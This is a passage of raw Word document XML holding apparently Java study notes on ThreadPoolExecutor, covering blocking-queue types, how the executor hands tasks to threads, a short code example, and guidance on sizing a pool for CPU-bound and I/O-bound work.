    <w:p w14:paraId="326B6D58" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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nchronousQueue has a capacity of zero, so tasks can only be executed when threads are available to consume them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11413595" w14:textId="37FE60B2" w:rsidR="00734603" w:rsidRPr="00CE4B95" w:rsidRDefault="007346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6910400"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</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Runnable</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queu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nchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3582D3" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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iorityBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8A29A" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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is a special kind of blocking queue where tasks are ordered based on their priority rather than the order in which they are submitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2F8DD" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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asks are submitted with priority information, this queue will process higher-priority tasks first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F64503" w14:textId="6FAFF8F5" w:rsidR="003646F6" w:rsidRPr="00CE4B95" w:rsidRDefault="003646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9302226"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</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Runnable</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queu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riorityBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586AF3E4" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA708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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1B648C" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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hen a task is submitted to the executor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The ThreadPoolExecutor puts the task into the queue (like a BlockingQueue).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED05DC" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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hread Selection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a worker thread is idle or available, it takes the task from the queue and executes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0688D6" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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locking Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the queue is full, the BlockingQueue will block the submitter until space is available (in the case of a bounded queue). Similarly, threads will wait if the queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC5142" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA708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5B2E029A" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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cpuCou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unti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Runti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vailableProcessors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26AC49" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BlockingQueue</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Runnable</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queu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nkedBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC13EE" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executo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PoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39858021" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cpuCou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puCou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60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imeUni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ECOND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queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519156B1" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB7A2EF" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F29479" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Submit tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F36C424" w14:textId="77777777" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execut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ubmi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Task 1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492BDB4" w14:textId="53F20C6E" w:rsidR="00F921C0" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execut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ubmi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Task 2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13084326" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA708F">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3F04D41C" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA7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BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like LinkedBlockingQueue, ArrayBlockingQueue, SynchronousQueue, etc.) is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data structure</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to store the tasks waiting to be executed in a ThreadPoolExecutor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749FEB4" w14:textId="77777777" w:rsidR="00CA708F" w:rsidRPr="00CE4B95" w:rsidRDefault="00CA708F" w:rsidP="00CA708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exact implementation of the queue may vary depending on whether you want to limit the queue size, prioritize tasks, or handle concurrent task submissions efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F276AFB" w14:textId="6BB6D118" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CA708F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="6A5C22FA">
          <v:rect id="_x0000_i1847" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5232950C" w14:textId="77777777" w:rsidR="00096260" w:rsidRPr="00CE4B95" w:rsidRDefault="00096260" w:rsidP="00CA708F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEA208A" w14:textId="000CE971" w:rsidR="00423158" w:rsidRPr="00CE4B95" w:rsidRDefault="00423158">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc196307759"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">When we </w:t>
      </w:r>
      <w:r w:rsidR="004D37A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Thread Pool Executor so what will be the ideal count</w:t>
      </w:r>
      <w:r w:rsidR="004D37A4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>, how many thread we should keep in it</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p w14:paraId="24E888E6" w14:textId="35EBFDCA" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3">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ideal thread count</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> depends on several factors, such as the nature of the tasks you're executing, the system's hardware capabilities (like the number of CPU cores), and the type of workload you're handling (I/O-bound vs CPU-bound). There's no one-size-fits-all answer, but I can help guide you to an optimal setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F9D98A" w14:textId="77777777" w:rsidR="00A9022F" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9022F" w:rsidP="00826ACD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D8B6ED" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE4DA2" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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PU-bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142507C9" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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se are tasks that perform intensive computations (e.g., number-crunching tasks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA86BE1" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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ince CPU-bound tasks require significant CPU time and only one thread can execute on a single core at a time, the ideal number of threads is usually </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equal to the number of CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F89FB" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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For example, if you have a 4-core CPU, a thread pool of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4 threads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is ideal, since adding more threads would not increase the throughput and could actually reduce performance due to excessive context switching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D23C0" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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O-bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76712DC0" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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se tasks spend more time waiting for I/O operations, like reading files, making network requests, or waiting for database queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF51702" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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O-bound tasks are less dependent on the number of CPU cores because the threads often spend time in a waiting state rather than actively using the CPU. Therefore, the thread pool can have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more threads than the number of CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B809618" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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common guideline is to have a thread pool size of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>N + (N / 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where N is the number of CPU cores. This accounts for the threads waiting on I/O and helps utilize CPU cores while waiting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0B05FD" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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General Guidelines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F18AA3" w14:textId="77777777" w:rsidR="003525F3" w:rsidRPr="00CE4B95" w:rsidRDefault="003525F3" w:rsidP="003525F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or CPU-bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Set the pool size to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number of available CPU cores</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Runtime.getRuntime().availableProcessors()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E995E4" w14:textId="77777777" w:rsidR="003144C5" w:rsidRPr="00CE4B95" w:rsidRDefault="003144C5" w:rsidP="003525F3">
      <w:pPr>
